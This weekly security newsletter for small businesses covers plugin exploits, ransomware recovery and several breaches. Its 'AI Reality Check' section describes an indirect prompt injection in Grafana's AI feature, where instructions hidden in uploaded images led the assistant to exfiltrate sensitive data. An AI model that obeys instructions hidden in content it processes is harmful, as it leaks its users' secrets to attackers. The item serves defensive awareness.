PHISH & TELL™ –
The Cyber & AI Risk Triage Desk
So your business doesn’t break while you’re busy running it.
A 5-minute weekly brief that tells you what to ignore, what to fix, and what can wait.
Welcome back to your quick security tune‑up for busy founders and small‑business owners. This week’s briefing highlights urgent plugin updates, AI‑assisted attacks and reader questions about ransomware recovery.
Let’s dive in 👇
THIS WEEK’S 10-MINUTE WIN
Update your website plugins before attackers do
If you…
Use WordPress or Joomla plugins like Ninja Forms or Smart Slider 3 Pro on your site.
Should you care?
✅ YES – urgently – Your site collects customer contacts or takes payments. Attackers are exploiting a critical file‑upload flaw in Ninja Forms and a hijacked update for Smart Slider 3 Pro to plant backdoors.
🤷♀ MAYBE – worth checking – Your site runs WordPress/Joomla but doesn’t use these plugins. Auto‑updates could still pull malicious code from compromised feeds.
❌ NO – low priority (for now) – You don’t run a CMS or your plugins are fully patched and monitored.
What’s happening (plain English)?
Two of the most popular website plugins for small businesses have been in the news. A critical vulnerability in the Ninja Forms File Upload add‑on lets anyone upload a malicious file to your server and take it over. Meanwhile, attackers hijacked the update server for Smart Slider 3 Pro and distributed a trojanized version that creates hidden admin accounts and installs multiple backdoors. Both are actively exploited.
Do this now
Update Ninja Forms to version 3.3.27 or later. Disable file uploads temporarily if you can’t patch immediately.
Check your Smart Slider version. If you installed version 3.5.1.35 between 5 and 9 April, assume compromise. Restore from a backup, update to 3.5.1.36, delete hidden admin users and rotate all passwords.
Audit all plugins. Turn off auto‑updates for premium plugins unless you trust the vendor’s update channel. Use a Web Application Firewall to detect malicious uploads.
AI REALITY CHECK
AI features can leak your secrets
What happened: Researchers discovered an indirect prompt injection vulnerability in Grafana’s AI‑powered “Insights” feature. By hiding malicious instructions inside uploaded images, an attacker could trick the AI assistant into exfiltrating sensitive data. Grafana patched the flaw in version 11.0.1. They are by far not the only ones to have had this type of vulnerability.
Why it matters: Generative‑AI tools are being built into dashboards, chatbots and analytics platforms. While they promise convenience, they can be manipulated. Prompt‑injection attacks exploit the AI’s trust in user‑supplied content to force it to reveal internal secrets, execute unintended actions or call external services.
What to do:
Update AI‑enabled software. Install the latest releases of AI-enabled software and apply patches promptly.
Limit AI access to sensitive data. Configure your tools so AI functions can only see non‑confidential information.
Be skeptical of untrusted inputs. Avoid uploading arbitrary images or documents into AI features and educate your team about prompt injection risks.
READER QUESTION OF THE WEEK
How can I protect my business from ransomware and recover without paying attackers?
A reader wrote: “How can I recover from ransomware without paying the ransom?” It’s a pressing concern — more than half of small businesses hit by ransomware pay up, often out of pocket. Here’s what security professionals and fellow entrepreneurs suggest:
Backup like a pro. Follow the 3‑2‑1 rule: keep three copies of your data on two different media, with at least one copy stored offsite or offline. Consider immutable backups that can’t be overwritten by ransomware. Tools like Veeam, Acronis or Backblaze make this affordable for SMBs. (If you use a managed security service provider, they can usually provide this so you don’t have to manage yet another account and process.)
Use a hybrid approach. Keep local backups for quick restores and cloud backups for resilience. Make sure your backup systems are not permanently connected to your network.
Test your recovery plan quarterly. A backup is useless if you don’t know how to restore it. Schedule drills to ensure you can rebuild systems quickly.
Segment your network. Limit how far ransomware can spread. Separating accounting systems from employee laptops can turn a crisis into a nuisance. Separating a work network from a home network keeps your data secure from gaming clicking kids. Setting up a guest network makes it easy to give visitors internet access without giving them access to your systems.
Invest in prevention instead of ransom. Cyber‑insurance premiums and backup subscriptions cost hundreds or low thousands, whereas ransom demands average $130K+. Prevention is the cheaper option.
In short, ransom‑free recovery starts long before an attack. Solid backups, regular testing and segmentation give you leverage to walk away from ransom demands.
RISK RADAR
Also happening this week
Router DNS hijacks used to steal Microsoft 365 logins
Law enforcement disrupted APT28’s campaign that altered DNS settings on 18,000 MikroTik and TP‑Link routers to intercept OAuth tokens.
Fix: Replace unsupported routers, update firmware, disable remote management and turn on DNS‑over‑HTTPS.
Mac malware hides in “disk cleanup” guides
Atomic Stealer campaigns use the macOS Script Editor to run hidden scripts when users follow fake performance‑boosting instructions.
Fix: Don’t run scripts from unverified websites. Use only official Apple documentation and install anti‑malware tools.
Credit‑card skimmer masked as a 1×1‑pixel image
Magento e‑commerce sites are being injected with a tiny SVG file that contains a base64‑encoded card‑stealing script.
Fix: Scan your site for hidden SVG tags, remove malicious code, block suspicious outbound domains and apply Adobe’s pre‑release patch.
Microsoft retires the Support and Recovery Assistant
Microsoft removed the SaRA troubleshooting tool and recommends switching to the Get Help app.
Fix: Uninstall SaRA from company devices, install Get Help and avoid downloading unofficial support tools.
SaaS vendor breach exposes Snowflake customer data
Attackers compromised analytics integrator Anodot and used stolen authentication tokens to download data from Snowflake customers.
Fix: Review third‑party integrations, revoke unused access tokens and monitor for unusual downloads.
You don’t need to act on these unless they apply to you.
ON THE PERSONAL SIDE
Learned something about myself
Well, I kinda knew this, but it was a good reminder that I need this. I had to drive between North Carolina and Delaware four times over the past two weeks and that gave me lots of time to think. Lots. (If you aren’t familiar with the geography, that’s about 7-9 hours of driving one way, depending on whether you hit rush hour.) I had a ton of ideas pop up. Several with potential, some less so. A little voice dictation to capture them, and I have some interesting projects to look forward to! What I was reminded of, though, is that I need that thinking time, where I’m not trying to multi-task or context switch. That time is important for strategic thinking — give yourself that space on a regular basis. I will be.
Before you go
Thank you for carving out a few minutes to get smarter about security. Every small step adds up to real resilience. Take a moment to celebrate those wins. If there’s a security question keeping you up at night, hit reply and tell me about it — we’ll tackle it together.
~Alexia
P.S. No office hours this week because I’m helping my mother out, but don’t hesitate to reply to this email if you have questions. Friday office hours start up again next week. Want to get them on your calendar? Click here.
My weekly question to you: I’m curious how many people sell or want to sell into larger enterprises — has that been a challenge? Security is often a blocker and I have some ideas how I can help. I’d like to hear from you.
You’re subscribed to Phish & Tell™️ because your business is worth protecting. |
🩷 |
